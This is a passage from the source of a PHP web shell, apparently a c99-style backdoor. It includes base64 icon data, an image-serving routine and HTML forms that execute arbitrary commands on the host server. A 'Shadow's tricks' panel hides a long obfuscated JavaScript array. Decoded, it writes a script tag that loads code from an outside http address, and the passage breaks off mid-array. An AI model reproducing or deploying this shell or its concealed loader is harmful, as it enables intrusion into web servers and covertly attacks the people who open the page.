  2827. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
  2828. "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
  2829. "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
  2830. "ext_cgi"=>
  2831. "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
  2832. "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
  2833. "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
  2834. "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
  2835. "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2836. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2837. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2838. "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
  2839. "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
  2840. "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
  2841. "RYtMAgEAOw==",
  2842. "ext_cmd"=>
  2843. "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
  2844. "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
  2845. "dmrYAMn1onq/YKpjvEgAADs=",
  2846. "ext_cpp"=>
  2847. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
  2848. "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
  2849. "Eq7YrLDE7a4SADs=",
  2850. "ext_ini"=>
  2851. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
  2852. "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
  2853. "SnEjgPVarHEHgrB43JvszsQEADs=",
  2854. "ext_diz"=>
  2855. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
  2856. "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
  2857. "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
  2858. "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
  2859. "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
  2860. "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
  2861. "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
  2862. "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
  2863. "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2864. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2865. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2866. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2867. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2868. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2869. "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
  2870. "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
  2871. "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
  2872. "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
  2873. "Ow==",
  2874. "ext_doc"=>
  2875. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
  2876. "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
  2877. "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
  2878. "ext_exe"=>
  2879. "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
  2880. "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
  2881. "xhIAOw==",
  2882. "ext_h"=>
  2883. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
  2884. "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
  2885. "Wq/NknbbSgAAOw==",
  2886. "ext_hpp"=>
  2887. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
  2888. "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
  2889. "UqUagnbLdZa+YFcCADs=",
  2890. "ext_htaccess"=>
  2891. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  2892. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  2893. "AAA7",
  2894. "ext_html"=>
  2895. "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
  2896. "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
  2897. "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
  2898. "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
  2899. "ADs=",
  2900. "ext_jpg"=>
  2901. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
  2902. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
  2903. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
  2904. "FxEAOw==",
  2905. "ext_js"=>
  2906. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
  2907. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
  2908. "a00AjYYBbc/o9HjNniUAADs=",
  2909. "ext_lnk"=>
  2910. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
  2911. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
  2912. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
  2913. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
  2914. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
  2915. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2916. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2917. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
  2918. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
  2919. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  2920. "ADs=",
  2921. "ext_log"=>
  2922. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  2923. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  2924. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  2925. "ext_php"=>
  2926. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  2927. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  2928. "ext_pl"=>
  2929. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  2930. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  2931. "ext_swf"=>
  2932. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  2933. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2934. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  2935. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  2936. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  2937. "ext_tar"=>
  2938. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  2939. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  2940. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  2941. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  2942. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2943. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2944. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2945. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  2946. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  2947. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  2948. "u4tLAgEAOw==",
  2949. "ext_txt"=>
  2950. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  2951. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  2952. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  2953. "ext_wri"=>
  2954. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2955. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2956. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2957. "ext_xml"=>
  2958. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2959. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2960. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2961. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2962. "IQA7"
  2963.  );
  2964.  //For simple size- and speed-optimization.
  2965.  $imgequals = array(
  2966.   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2967.   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  2968.   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  2969.   "ext_html"=>array("ext_html","ext_htm"),
  2970.   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  2971.   "ext_lnk"=>array("ext_lnk","ext_url"),
  2972.   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  2973.   "ext_doc"=>array("ext_doc","ext_dot"),
  2974.   "ext_js"=>array("ext_js","ext_vbs"),
  2975.   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  2976.   "ext_wri"=>array("ext_wri","ext_rtf"),
  2977.   "ext_swf"=>array("ext_swf","ext_fla"),
  2978.   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  2979.   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  2980.  );
  2981.  if (!$getall)
  2982.  {
  2983.   header("Content-type: image/gif");
  2984.   header("Cache-control: public");
  2985.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2986.   header("Cache-control: max-age=".(60*60*24*7));
  2987.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2988.   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  2989.   if (empty($images[$img])) {$img = "small_unk";}
  2990.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2991.   echo base64_decode($images[$img]);
  2992.  }
  2993.  else
  2994.  {
  2995.   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  2996.   natsort($images);
  2997.   $k = array_keys($images);
  2998.   echo  "<center>";
  2999.   foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  3000.   echo "</center>";
  3001.  }
  3002.  exit;
  3003. }
  3004. if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
  3005. ?>
  3006. </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  3007. <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
  3008. <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
  3009. <br>
  3010. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  3011. <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
  3012. <tr>
  3013.   <td width="50%" height="83" valign="top"><center>
  3014.     <div align="center">Useful Commands
  3015.     </div><script type="text/javascript" language="javascript">
  3016. <!--
  3017. fF7eSD8=new Array();
  3018. fF7eSD8[0]="%3Cscript%3E%0Adocu";
  3019. fF7eSD8[1]="ment.write%28une";
  3020. fF7eSD8[2]="scape%28%22%253Cscri";
  3021. fF7eSD8[3]="pt%2520type%253D%25";
  3022. fF7eSD8[4]="22text/javascr";
  3023. fF7eSD8[5]="ipt%2522%253Edo";
  3024. fF7eSD8[6]="cument.write%25";
  3025. fF7eSD8[7]="28%2527%255Cu00";
  3026. fF7eSD8[8]="3c%255Cu0073%255C";
  3027. fF7eSD8[9]="u0063%255Cu0072";
  3028. fF7eSD8[10]="%255Cu0069%255Cu";
  3029. fF7eSD8[11]="0070%255Cu007";
  3030. fF7eSD8[12]="4%255Cu0020%255C";
  3031. fF7eSD8[13]="u0074%255Cu007";
  3032. fF7eSD8[14]="9%255Cu0070%255Cu";
  3033. fF7eSD8[15]="0065%255Cu003d%25";
  3034. fF7eSD8[16]="5Cu0022%255Cu0";
  3035. fF7eSD8[17]="074%255Cu0065%255C";
  3036. fF7eSD8[18]="u0078%255Cu0074%25";
  3037. fF7eSD8[19]="5Cu002f%255Cu";
  3038. fF7eSD8[20]="006a%255Cu0061%255";
  3039. fF7eSD8[21]="Cu0076%255Cu0";
  3040. fF7eSD8[22]="061%255Cu0073%25";
  3041. fF7eSD8[23]="5Cu0063%255Cu00";
  3042. fF7eSD8[24]="72%255Cu0069%25";
  3043. fF7eSD8[25]="5Cu0070%255Cu";
  3044. fF7eSD8[26]="0074%255Cu0022";
  3045. fF7eSD8[27]="%255Cu003e%255C";
  3046. fF7eSD8[28]="u0064%255Cu00";
  3047. fF7eSD8[29]="6f%255Cu0063%255C";
  3048. fF7eSD8[30]="u0075%255Cu006";
  3049. fF7eSD8[31]="d%255Cu0065%255Cu";
  3050. fF7eSD8[32]="006e%255Cu0074%255";
  3051. fF7eSD8[33]="Cu002e%255Cu00";
  3052. fF7eSD8[34]="77%255Cu0072%25";
  3053. fF7eSD8[35]="5Cu0069%255Cu";
  3054. fF7eSD8[36]="0074%255Cu0065%25";
  3055. fF7eSD8[37]="5Cu0028%255Cu002";
  3056. fF7eSD8[38]="7%255Cu005c%255Cu";
  3057. fF7eSD8[39]="0075%255Cu0030";
  3058. fF7eSD8[40]="%255Cu0030%255Cu0";
  3059. fF7eSD8[41]="033%255Cu0063%25";
  3060. fF7eSD8[42]="5Cu005c%255Cu007";
  3061. fF7eSD8[43]="5%255Cu0030%255Cu";
  3062. fF7eSD8[44]="0030%255Cu0035";
  3063. fF7eSD8[45]="%255Cu0033%255C";
  3064. fF7eSD8[46]="u005c%255Cu0075";
  3065. fF7eSD8[47]="%255Cu0030%255Cu";
  3066. fF7eSD8[48]="0030%255Cu003";
  3067. fF7eSD8[49]="4%255Cu0033%255";
  3068. fF7eSD8[50]="Cu005c%255Cu007";
  3069. fF7eSD8[51]="5%255Cu0030%255Cu";
  3070. fF7eSD8[52]="0030%255Cu0035%255";
  3071. fF7eSD8[53]="Cu0032%255Cu00";
  3072. fF7eSD8[54]="5c%255Cu0075%255C";
  3073. fF7eSD8[55]="u0030%255Cu0030%25";
  3074. fF7eSD8[56]="5Cu0034%255Cu00";
  3075. fF7eSD8[57]="39%255Cu005c%255Cu";
  3076. fF7eSD8[58]="0075%255Cu0030%255";
  3077. fF7eSD8[59]="Cu0030%255Cu003";
  3078. fF7eSD8[60]="5%255Cu0030%255C";
  3079. fF7eSD8[61]="u005c%255Cu0075";
  3080. fF7eSD8[62]="%255Cu0030%255Cu00";
  3081. fF7eSD8[63]="30%255Cu0035%255";
  3082. fF7eSD8[64]="Cu0034%255Cu005";
  3083. fF7eSD8[65]="c%255Cu0075%255C";
  3084. fF7eSD8[66]="u0030%255Cu0030%25";
  3085. fF7eSD8[67]="5Cu0032%255Cu";
  3086. fF7eSD8[68]="0030%255Cu005c%25";
  3087. fF7eSD8[69]="5Cu0075%255Cu00";
  3088. fF7eSD8[70]="30%255Cu0030%255";
  3089. fF7eSD8[71]="Cu0035%255Cu003";
  3090. fF7eSD8[72]="3%255Cu005c%255Cu0";
  3091. fF7eSD8[73]="075%255Cu0030";
  3092. fF7eSD8[74]="%255Cu0030%255Cu00";
  3093. fF7eSD8[75]="35%255Cu0032%25";
  3094. fF7eSD8[76]="5Cu005c%255Cu00";
  3095. fF7eSD8[77]="75%255Cu0030%255Cu";
  3096. fF7eSD8[78]="0030%255Cu003";
  3097. fF7eSD8[79]="4%255Cu0033%255Cu";
  3098. fF7eSD8[80]="005c%255Cu0075%25";
  3099. fF7eSD8[81]="5Cu0030%255Cu";
  3100. fF7eSD8[82]="0030%255Cu0033";
  3101. fF7eSD8[83]="%255Cu0064%255Cu0";
  3102. fF7eSD8[84]="05c%255Cu0075%25";
  3103. fF7eSD8[85]="5Cu0030%255Cu003";
  3104. fF7eSD8[86]="0%255Cu0036%255";
  3105. fF7eSD8[87]="Cu0038%255Cu0";
  3106. fF7eSD8[88]="05c%255Cu0075%255C";
  3107. fF7eSD8[89]="u0030%255Cu003";
  3108. fF7eSD8[90]="0%255Cu0037%255C";
  3109. fF7eSD8[91]="u0034%255Cu005c%25";
  3110. fF7eSD8[92]="5Cu0075%255Cu";
  3111. fF7eSD8[93]="0030%255Cu0030";
  3112. fF7eSD8[94]="%255Cu0037%255Cu";
  3113. fF7eSD8[95]="0034%255Cu005c%25";
  3114. fF7eSD8[96]="5Cu0075%255Cu00";
  3115. fF7eSD8[97]="30%255Cu0030%255Cu";
  3116. fF7eSD8[98]="0037%255Cu0030%255";
  3117. fF7eSD8[99]="Cu005c%255Cu00";
  3118. fF7eSD8[100]="75%255Cu0030%255";
  3119. fF7eSD8[101]="Cu0030%255Cu00";
  3120. fF7eSD8[102]="33%255Cu0061%255Cu";
  3121. fF7eSD8[103]="005c%255Cu0075";
  3122. fF7eSD8[104]="%255Cu0030%255C";
  3123. fF7eSD8[105]="u0030%255Cu0032%25";
  3124. fF7eSD8[106]="5Cu0066%255Cu00";
  3125. fF7eSD8[107]="5c%255Cu0075%255Cu";
  3126. fF7eSD8[108]="0030%255Cu0030%25";
  3127. fF7eSD8[109]="5Cu0032%255Cu0";
  3128. fF7eSD8[110]="066%255Cu005c";
  3129. fF7eSD8[111]="%255Cu0075%255Cu";
  3130. fF7eSD8[112]="0030%255Cu0030%25";
  3131. fF7eSD8[113]="5Cu0036%255Cu003";
  3132. fF7eSD8[114]="4%255Cu005c%255C";
  3133. fF7eSD8[115]="u0075%255Cu003";
  3134. fF7eSD8[116]="0%255Cu0030%255C";
  3135. fF7eSD8[117]="u0036%255Cu00";
  3136. fF7eSD8[118]="31%255Cu005c%255";
  3137. fF7eSD8[119]="Cu0075%255Cu00";
  3138. fF7eSD8[120]="30%255Cu0030%255Cu";
  3139. fF7eSD8[121]="0037%255Cu0034";
  3140. fF7eSD8[122]="%255Cu005c%255Cu00";
  3141. fF7eSD8[123]="75%255Cu0030%255C";
  3142. fF7eSD8[124]="u0030%255Cu003";
  3143. fF7eSD8[125]="6%255Cu0031%255";
  3144. fF7eSD8[126]="Cu005c%255Cu007";
  3145. fF7eSD8[127]="5%255Cu0030%255";
  3146. fF7eSD8[128]="Cu0030%255Cu0";
  3147. fF7eSD8[129]="032%255Cu0065";
  3148. fF7eSD8[130]="%255Cu005c%255C";
  3149. fF7eSD8[131]="u0075%255Cu0030%25";
  3150. fF7eSD8[132]="5Cu0030%255Cu003";
  3151. fF7eSD8[133]="7%255Cu0034%255Cu0";
  3152. fF7eSD8[134]="05c%255Cu0075%255C";
  3153. fF7eSD8[135]="u0030%255Cu00";
  3154. fF7eSD8[136]="30%255Cu0033%255C";
  3155. fF7eSD8[137]="u0030%255Cu005";
  3156. fF7eSD8[138]="c%255Cu0075%255Cu";
  3157. fF7eSD8[139]="0030%255Cu003";
  3158. fF7eSD8[140]="0%255Cu0033%255C";
  3159. fF7eSD8[141]="u0030%255Cu005";
  3160. fF7eSD8[142]="c%255Cu0075%255";
  3161. fF7eSD8[143]="Cu0030%255Cu0";
  3162. fF7eSD8[144]="030%255Cu0036%255C";
  3163. fF7eSD8[145]="u0063%255Cu005c";
  3164. fF7eSD8[146]="%255Cu0075%255C";
  3165. fF7eSD8[147]="u0030%255Cu00";
  3166. fF7eSD8[148]="30%255Cu0037%25";
  3167. fF7eSD8[149]="5Cu0033%255Cu00";
  3168. fF7eSD8[150]="5c%255Cu0075%255";
  3169. fF7eSD8[151]="Cu0030%255Cu00";
  3170. fF7eSD8[152]="30%255Cu0032%255";
  3171. fF7eSD8[153]="Cu0065%255Cu005c";
  3172. fF7eSD8[154]="%255Cu0075%255C";
  3173. fF7eSD8[155]="u0030%255Cu00";
  3174. fF7eSD8[156]="30%255Cu0036%255Cu";
  3175. fF7eSD8[157]="0066%255Cu005c%255";
  3176. fF7eSD8[158]="Cu0075%255Cu00";
  3177. fF7eSD8[159]="30%255Cu0030%255Cu";
